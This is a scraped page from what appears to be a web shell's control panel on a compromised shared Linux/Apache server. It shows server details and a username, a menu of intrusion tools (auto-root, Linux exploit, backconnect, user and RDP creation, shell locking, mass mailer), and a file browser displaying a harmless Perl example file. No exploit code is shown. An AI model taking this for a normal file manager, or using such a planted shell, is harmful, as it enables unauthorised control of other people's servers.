Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libevent-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
echo.t
759
B
-rw-r--r--
group.t
571
B
-rw-r--r--
idle2.t
1.2
KB
-rw-r--r--
msg.pm
1016
B
-rw-r--r--
perlqt.t
2.45
KB
-rw-r--r--
process.pm
1.59
KB
-rw-r--r--
queue_pending.t
792
B
-rw-r--r--
rand_interval.t
323
B
-rw-r--r--
readline.t
2.28
KB
-rw-r--r--
repeat.t
1005
B
-rw-r--r--
semaphore.pm
1.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : msg.pm
die "SysV messages are not implemented yet. Send email to perl-loop@perl.org if you think this is a problem. Thanks!\n"; package Event::msg; use Event; use IPC::Msg; register Event; my %MSG; my $LABEL = "msg000000"; sub new { use attrs qw(locked method); my $class = shift; my %arg = @_; my $msg = $arg{'-msg'}; my $cb = $arg{'-callback'}; croak 'Event->msg( -msg => $msg, -callback => $coderef)' unless(UNIVERSAL::isa($msg,'IPC::Msg') && UNIVERSAL::isa($cb,'CODE')); my $obj = { callback => $cb, msg => $msg, label => $label++ }, $class; $msg{$obj->{'label'}} = $obj; $obj; } sub cancel { my $self = shift; delete $msg{$self->{'label'}}; } sub prepare { 3600 } sub check { my $obj; my @del = (); foreach $obj (values %msg) { my $ds = $obj->{'msg'}->stat; if($ds->qnum && $ds->lspid != $$) my($o,$cb,$msg) = ($obj,$obj->{'callback'},$obj->{'msg'}); Event->queueEvent( sub { $cb->($o,$msg) } ); } } 1; } 1;
Close